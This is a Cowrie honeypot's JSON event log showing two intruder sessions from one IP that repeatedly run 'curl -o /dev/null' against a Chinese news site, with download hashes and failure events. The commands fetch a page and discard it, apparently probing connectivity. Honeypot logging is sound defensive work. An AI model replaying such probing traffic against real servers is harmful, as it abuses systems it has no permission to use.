{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.478353Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.487089Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.492091Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.493918Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:46.502056Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.503216Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.506315Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:46.520298Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.521532Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.546253Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:46.547936Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.549712Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:46.564794Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.566128Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:46.590395Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.591761Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.594873Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.596817Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:46.602684Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.603876Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:46.631519Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.632656Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.637484Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:46.640239Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.641208Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.654057Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:46.667409Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.668990Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:46.691472Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.694538Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.727314Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.732210Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:46.736866Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.737986Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.740668Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.769446Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.793306Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.814484Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:46.837673Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.839250Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.842807Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.844230Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.882075Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:46.885307Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.886747Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.897293Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:46.900893Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.901843Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.923110Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:46.925466Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.926881Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:46.943820Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.944909Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:46.962502Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.964031Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:46.985045Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:46.986392Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:47.003378Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.004879Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.025223Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:47.026773Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.027792Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.030894Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:47.044000Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.045270Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.052954Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.054882Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:47.073900Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.075280Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:47.085422Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.086630Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.096103Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.097206Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:47.114321Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.115759Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:47.126238Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.127759Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.132359Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.144886Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.147769Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:47.159518Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.160497Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:47.166308Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.167741Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.172146Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.188993Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.203194Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:47.207424Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.208628Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:47.213298Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.214305Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.233387Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:47.257613Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.259165Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:47.262820Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.264162Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.277245Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.279270Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:47.297629Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.299054Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.304218Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:47.305904Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:47.307648Z","src_ip":"212.227.125.160","session":"7541ed730449"}
